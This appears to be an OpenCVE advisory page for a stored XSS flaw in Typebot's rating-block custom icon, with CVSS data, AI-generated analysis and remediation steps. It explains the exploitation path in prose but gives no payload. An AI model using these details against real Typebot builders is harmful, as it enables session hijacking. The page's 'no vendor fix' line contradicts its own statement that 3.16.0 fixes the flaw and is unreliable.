Description
Typebot is a chatbot builder tool. In versions 3.15.2 and prior, the RatingButton component in the embed package renders the user-controlled customIcon.svg field directly via Solid's innerHTML directive without any sanitization, even though DOMPurify is already a dependency and is used elsewhere in the codebase (e.g., StreamingBubble.tsx). Because rating blocks are not flagged as isUnsafe by the import sanitizer and the builder preview renders bots inline on the builder's own origin (builder.typebot.io) under a CSP permitting 'unsafe-inline', a malicious imported or collaborator-crafted typebot can execute arbitrary HTML/JS in the builder's authenticated context, bypassing the Web Worker sandbox that protects Script blocks during preview. This allows session hijacking and privilege escalation within the builder application. This issue has been fixed in version 3.16.0.
Published: 2026-05-22
Score: 8.7 High
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A stored cross‑site scripting flaw exists in the RatingButton component of Typebot’s embed package. The component renders a user‑controlled customIcon.svg field directly with Solid’s innerHTML directive, bypassing the sanitizer that protects other parts of the codebase. Because the builder preview runs on the same origin and allows unsafe inline scripts, arbitrary HTML or JavaScript can execute in the context of an authenticated builder user, enabling session hijacking and privilege escalation. This flaw is a classic example of CWE‑79.

Affected Systems

The vulnerability affects the Typebot service provided by typebot.io. Versions 3.15.2 and all earlier releases are affected; the fix is included in version 3.16.0.

Risk and Exploitability

The CVSS score of 8.7 indicates high severity, and the EPSS score is not available, but the lack of listing in CISA KEV does not lower the risk for an authenticated user. An attacker who can supply or collaborate on a bot must be authenticated within the builder to exploit the flaw, after which the malicious script runs with the builder’s privileges. Because the preview bypasses the Web Worker sandbox, the attack surface is large and the potential impact spans confidentiality, integrity, and availability of the builder application.

Generated by OpenCVE AI on May 22, 2026 at 17:20 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade to Typebot version 3.16.0 or later where the vulnerability is fixed.
  • If an immediate upgrade is not possible, restrict the import of bots containing a customIcon.svg from untrusted collaborators or disable rating blocks that accept custom icons.
  • Re‑configure the Content Security Policy on the builder domain to disallow unsafe‑inline scripts, or implement server‑side sanitization of customIcon.svg before it is rendered in the preview.

Generated by OpenCVE AI on May 22, 2026 at 17:20 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Fri, 22 May 2026 18:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 22 May 2026 16:30:00 +0000

Type Values Removed Values Added
Description Typebot is a chatbot builder tool. In versions 3.15.2 and prior, the RatingButton component in the embed package renders the user-controlled customIcon.svg field directly via Solid's innerHTML directive without any sanitization, even though DOMPurify is already a dependency and is used elsewhere in the codebase (e.g., StreamingBubble.tsx). Because rating blocks are not flagged as isUnsafe by the import sanitizer and the builder preview renders bots inline on the builder's own origin (builder.typebot.io) under a CSP permitting 'unsafe-inline', a malicious imported or collaborator-crafted typebot can execute arbitrary HTML/JS in the builder's authenticated context, bypassing the Web Worker sandbox that protects Script blocks during preview. This allows session hijacking and privilege escalation within the builder application. This issue has been fixed in version 3.16.0.
Title Typebot: Stored XSS via Rating Block Custom Icon Bypasses isUnsafe Sandbox in Builder Preview
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 8.7, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}

Subscriptions

No data.

cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-05-22T17:52:34.728Z

Reserved: 2026-02-27T15:54:05.140Z

Link: CVE-2026-28445

cve-icon Vulnrichment

Updated: 2026-05-22T17:50:24.741Z

cve-icon NVD

No data.

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-22T17:30:06Z

Weaknesses